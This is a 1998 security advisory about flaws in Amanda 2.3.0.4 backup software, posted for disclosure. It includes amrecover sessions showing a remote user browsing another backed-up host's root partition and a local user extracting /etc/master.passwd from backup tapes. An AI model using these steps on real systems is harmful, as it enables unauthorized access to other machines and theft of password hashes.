(no subject)

joey@CORINNE.CPIO.ORG
Sat, 10 Jan 1998 04:19:22 +0000

**************** CPIO Security Notice ****************
Issue Number 11: 980105
************** http://www.darpanet.net **************
**** Amanda backup software ****

Amanda version 2.3.0.4

There are serveral security problems in the current version of Amanda.
The one that will be talked about today was one of the many problems
found by an OpenBSD security audit of their new ports tree. The Amanda
Core team has been contacted about these and other problems which are
not mentionded in the below advisory.
A new Amanda release should be out within a week or two.

1. Any attacker can remotely connect to an index server allowing
that person to access any machine being backed up.
2. Any attacker with local access to a machine being backed up has
access to any machine being backed up or any partion being backed
up.

In example 1 the players are:
index.servername.net | the affected index server.
remote.attacker.org | attackers computer
staff | a machine being backed up by the index server

1:
[remote%] amrecover -s index.servername.net
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
501 No index records for host: remote.attacker.org. Invalid?
amrecover> sethost staff
200 Dump host set to staff.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> ls
[ list of root partion ]

In example 2 the players are:
users | users shell machine being backed up
staff | staff machine being backed up

2:
[users%] amrecover
AMRECOVER Version 1.0. Contacting server on index.servername.net ...
220 index.servername.net AMANDA index server (1.0) ready.
Setting restore date to today (1997-12-24)
200 Working date set to 1997-12-24.
200 Config set to DailySet1.
200 Dump host set to users.
Divided $CWD into directory /joey on disk wd0f mounted at /home/home1.
200 Disk set to wd0f.
amrecover> setdisk wd0a
200 Disk set to wd0a
amrecover> cd etc
amrecover> add master.passwd
Added /etc/master.passwd
amrecover> extract
Extracting files using tape drive /dev/nrst0 on host index.servername.net.
The following tapes are needed: DAILY6
Restoring files into directory /home/home1/joey
Continue? [Y/n]: y
Load tape DAILY6 now
Continue? [Y/n]: y
amrecover> quit
[local%] pwd
/home/home1/joey
[local%] ls master.passwd
master.passwd

Contact: joey@cpio.org